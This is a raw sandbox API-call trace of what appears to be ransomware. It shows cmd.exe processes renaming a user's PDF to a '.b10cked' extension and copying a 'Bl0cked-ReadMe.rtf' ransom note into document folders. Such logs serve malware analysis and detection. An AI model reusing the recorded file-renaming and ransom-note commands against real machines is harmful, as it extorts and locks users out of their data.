returned 0x48 [0140.001] SetErrorMode (uMode=0x0) returned 0x1 [0140.001] SetErrorMode (uMode=0x0) returned 0x0 [0140.001] SetErrorMode (uMode=0x1) returned 0x0 [0140.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x16f3c0, lpFilePart=0x16ef50 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked", lpFilePart=0x16ef50*="tgRDf2UBQ_aR.pdf.b10cked") returned 0x54 [0140.001] SetErrorMode (uMode=0x0) returned 0x1 [0140.001] SetLastError (dwErrCode=0x0) [0140.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2ubq_ar.pdf.b10cked")) returned 0xffffffff [0140.001] GetLastError () returned 0x2 [0140.001] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x16e8cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e8cc) returned 0x1f22e8 [0140.001] FindNextFileW (in: hFindFile=0x1f22e8, lpFindFileData=0x16e8cc | out: lpFindFileData=0x16e8cc) returned 0 [0140.002] GetLastError () returned 0x12 [0140.002] FindClose (in: hFindFile=0x1f22e8 | out: hFindFile=0x1f22e8) returned 1 [0140.760] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x1f1e78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f1e78) returned 0x1f22e8 [0140.760] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x16eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked", lpFilePart=0x0) returned 0x54 [0140.760] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf", nBufferLength=0x104, lpBuffer=0x16eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf", lpFilePart=0x0) returned 0x4c [0140.760] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2ubq_ar.pdf")) returned 0x20 [0140.760] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2ubq_ar.pdf"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2ubq_ar.pdf.b10cked"), dwFlags=0x3) returned 1 [0140.761] FindClose (in: hFindFile=0x1f22e8 | out: hFindFile=0x1f22e8) returned 1 [0140.761] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16eb18 | out: _Buffer=" 1") returned 9 [0140.761] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.761] GetFileType (hFile=0x7) returned 0x2 [0140.761] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.761] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16eaa4 | out: lpMode=0x16eaa4) returned 1 [0140.761] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.761] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ead8 | out: lpConsoleScreenBufferInfo=0x16ead8) returned 1 [0140.762] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.762] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16eb18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.762] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16eafc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16eafc*=0x1a) returned 1 [0140.762] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.762] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.762] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.763] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.763] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.763] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.763] SetConsoleInputExeNameW () returned 0x1 [0140.763] GetConsoleOutputCP () returned 0x1b5 [0140.763] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.763] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.763] exit (_Code=0) Process: id = "170" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14890 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14891 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14892 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14893 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14894 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14895 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14896 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14897 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14898 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 14899 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15474 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15475 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15476 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15477 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 15478 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 15479 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15480 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15481 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15482 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15483 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15484 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15485 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15486 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15487 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15488 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 15489 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15490 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15491 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15492 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15493 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15494 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15495 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 15496 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 15497 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Thread: id = 227 os_tid = 0xf64 [0140.033] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afdec | out: lpSystemTimeAsFileTime=0x2afdec*(dwLowDateTime=0x8d656c40, dwHighDateTime=0x1d440a9)) [0140.033] GetCurrentProcessId () returned 0xf68 [0140.033] GetCurrentThreadId () returned 0xf64 [0140.033] GetTickCount () returned 0x2bfe4 [0140.033] QueryPerformanceCounter (in: lpPerformanceCount=0x2afde4 | out: lpPerformanceCount=0x2afde4*=19682219664) returned 1 [0140.034] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.034] __set_app_type (_Type=0x1) [0140.034] __p__fmode () returned 0x76b331f4 [0140.034] __p__commode () returned 0x76b331fc [0140.034] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.034] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.034] GetCurrentThreadId () returned 0xf64 [0140.034] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf64) returned 0x38 [0140.034] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.034] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.034] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.034] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.034] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afd7c | out: phkResult=0x2afd7c*=0x0) returned 0x2 [0140.034] VirtualQuery (in: lpAddress=0x2afdb3, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.034] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.035] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.035] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.035] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0140.035] GetConsoleOutputCP () returned 0x1b5 [0140.035] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.035] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.035] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.035] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.035] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.036] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.036] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.036] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.036] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.036] GetEnvironmentStringsW () returned 0x3601d8* [0140.036] FreeEnvironmentStringsW (penv=0x3601d8) returned 1 [0140.037] GetEnvironmentStringsW () returned 0x3601d8* [0140.037] FreeEnvironmentStringsW (penv=0x3601d8) returned 1 [0140.037] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aecec | out: phkResult=0x2aecec*=0x40) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x0, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x1, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x1, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x0, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x40, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x40, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x40, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegCloseKey (hKey=0x40) returned 0x0 [0140.037] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aecec | out: phkResult=0x2aecec*=0x40) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x40, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x1, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x1, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x0, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x9, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x9, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.038] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x9, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.038] RegCloseKey (hKey=0x40) returned 0x0 [0140.038] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.038] srand (_Seed=0x5b88636e) [0140.038] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0140.038] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0140.038] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.038] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.039] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.039] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.039] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.039] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.039] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.039] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.039] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.039] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.039] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.039] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.039] GetEnvironmentStringsW () returned 0x362328* [0140.039] FreeEnvironmentStringsW (penv=0x362328) returned 1 [0140.039] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.039] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.039] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.039] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.039] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.039] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.039] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.039] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.039] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.039] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.039] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afab8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.040] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afab8, lpFilePart=0x2afab4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afab4*="Desktop") returned 0x18 [0140.040] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.040] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af834 | out: lpFindFileData=0x2af834) returned 0x360068 [0140.040] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0140.040] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af834 | out: lpFindFileData=0x2af834) returned 0x360068 [0140.040] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0140.040] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af834 | out: lpFindFileData=0x2af834) returned 0x360068 [0140.040] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0140.040] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.041] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.041] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.041] GetEnvironmentStringsW () returned 0x362b48* [0140.041] FreeEnvironmentStringsW (penv=0x362b48) returned 1 [0140.041] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.041] GetConsoleOutputCP () returned 0x1b5 [0140.042] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 